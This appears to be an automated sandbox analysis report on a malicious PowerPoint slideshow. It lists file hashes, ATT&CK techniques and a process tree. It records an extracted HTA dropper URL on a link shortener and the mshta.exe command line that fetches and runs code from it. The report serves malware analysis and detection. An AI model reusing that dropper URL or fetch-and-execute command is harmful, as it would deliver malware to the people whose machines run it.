a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151

General

Target

a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps
Size

65KB
MD5

b3955e1cda42b669f89dd5f2ece4534e
SHA1

3e369400e83d66ebc6e704c6e2b7892f5907473f
SHA256

a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151
SHA512

9b82c26b9dd9d1f617a38922cfa058ee40d491b4b46fefd60238934e576859a54ae3ca534763649b25b1caea76c69f2800a21a3ade75420acff87608763d97ad

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://%20%20@j.mp/asdasjASDASDxaksxm

Signatures

Process spawned unexpected child process 17 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exemshta.exeipconfig.exeipconfig.exeipconfig.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2304	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3488	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4024	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2196	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1256	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	764	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1180	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	668	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3944	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3592	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3440	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3040	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3912	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	5064	2744	mshta.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	1768	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2920	2744	ipconfig.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4716	2744	ipconfig.exe	POWERPNT.EXE

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

21 5064 mshta.exe
23 5064 mshta.exe
26 5064 mshta.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

flow	pid	process
21	5064	mshta.exe
23	5064	mshta.exe
26	5064	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Gathers network information 2 TTPs 16 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
2304	ipconfig.exe
3944	ipconfig.exe
3912	ipconfig.exe
1768	ipconfig.exe
4716	ipconfig.exe
3488	ipconfig.exe
2196	ipconfig.exe
1180	ipconfig.exe
3440	ipconfig.exe
2920	ipconfig.exe
4024	ipconfig.exe
1256	ipconfig.exe
3592	ipconfig.exe
764	ipconfig.exe
668	ipconfig.exe
3040	ipconfig.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2744 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

POWERPNT.EXE

pid process

2744 POWERPNT.EXE
2744 POWERPNT.EXE

pid	process
2744	POWERPNT.EXE

pid	process
2744	POWERPNT.EXE
2744	POWERPNT.EXE

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

POWERPNT.EXE

description	pid	process	target process
PID 2744 wrote to memory of 2304	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 2304	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3488	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3488	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 2196	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 2196	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 4024	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 4024	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 1256	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 1256	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3944	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3944	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 764	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 764	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 1180	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 1180	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 668	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 668	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3592	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3592	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3440	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3440	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3912	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3912	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3040	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 3040	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 5064	2744	POWERPNT.EXE	mshta.exe
PID 2744 wrote to memory of 5064	2744	POWERPNT.EXE	mshta.exe
PID 2744 wrote to memory of 1768	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 1768	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 2920	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 2920	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 4716	2744	POWERPNT.EXE	ipconfig.exe
PID 2744 wrote to memory of 4716	2744	POWERPNT.EXE	ipconfig.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:2304

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3488

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:4024

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:2196

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1256

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:764

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1180

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:668

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3944

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3592

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3440

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3040

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:3912

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http:\\%20%20@j.mp\asdasjASDASDxaksxm
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:5064

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:1768

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:2920

C:\Windows\SYSTEM32\ipconfig.exe
ipconfig
2⤵
- Process spawned unexpected child process
- Gathers network information
PID:4716

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/668-145-0x0000000000000000-mapping.dmp

Download
memory/764-143-0x0000000000000000-mapping.dmp

Download
memory/1180-144-0x0000000000000000-mapping.dmp

Download
memory/1256-141-0x0000000000000000-mapping.dmp

Download
memory/1768-151-0x0000000000000000-mapping.dmp

Download
memory/2196-139-0x0000000000000000-mapping.dmp

Download
memory/2304-137-0x0000000000000000-mapping.dmp

Download
memory/2744-158-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-159-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-136-0x00007FFD3E940000-0x00007FFD3E950000-memory.dmp

Filesize
64KB

Download
memory/2744-135-0x00007FFD3E940000-0x00007FFD3E950000-memory.dmp

Filesize
64KB

Download
memory/2744-134-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-133-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-131-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-132-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-157-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-160-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2744-130-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmp

Filesize
64KB

Download
memory/2920-152-0x0000000000000000-mapping.dmp

Download
memory/3040-149-0x0000000000000000-mapping.dmp

Download
memory/3440-147-0x0000000000000000-mapping.dmp

Download
memory/3488-138-0x0000000000000000-mapping.dmp

Download
memory/3592-146-0x0000000000000000-mapping.dmp

Download
memory/3912-148-0x0000000000000000-mapping.dmp

Download
memory/3944-142-0x0000000000000000-mapping.dmp

Download
memory/4024-140-0x0000000000000000-mapping.dmp

Download
memory/4716-153-0x0000000000000000-mapping.dmp

Download
memory/5064-150-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads